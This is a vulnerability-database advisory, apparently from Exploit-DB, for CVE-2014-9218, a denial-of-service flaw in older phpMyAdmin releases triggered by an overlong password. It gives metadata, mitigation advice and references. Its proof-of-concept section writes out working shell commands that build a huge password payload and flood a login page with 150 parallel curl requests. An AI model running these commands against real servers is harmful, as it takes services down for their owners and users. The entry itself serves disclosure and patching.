phpMyAdmin Denial of Service Vulnerability

vendor:

phpMyAdmin

by:

Javer Nieto, Andres Rojas

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: phpMyAdmin

Affected Version From: 4.0.x before 4.0.10.7, 4.1. x before 4.1.14.8, and 4.2.x before 4.2.13.1

Affected Version To: None

Patch Exists: YES

Related CWE: CVE-2014-9218

CPE: a:phpmyadmin:phpmyadmin

Metasploit: https://www.rapid7.com/db/vulnerabilities/phpmyadmin-cve-2014-9218/, https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2014-9218/, https://www.rapid7.com/db/vulnerabilities/debian-cve-2014-9218/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-9218/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

phpMyAdmin Denial of Service Vulnerability

A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to cause a denial of service (resource consumption) via a long password.

Mitigation:

Upgrade to the latest version of phpMyAdmin

Source

Exploit-DB raw data:

=============
DESCRIPTION:
=============
A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers  to
cause a denial of service (resource consumption) via a long password.
CVE-2014-9218 was assigned

=============
Time Line:
=============
December 3, 2014 - A phpMyAdmin update and the security advisory is
published.

=============
Proof of Concept:
=============

*1 - Create the payload.*

$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
{1..1000000} >> payload

*2 - Performing the Denial of Service attack.*

$ for i in `seq 1 150`; do (curl --data @payload
http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done

=============
Authors:
=============

-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
=============

References:
====================================================================

*
http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php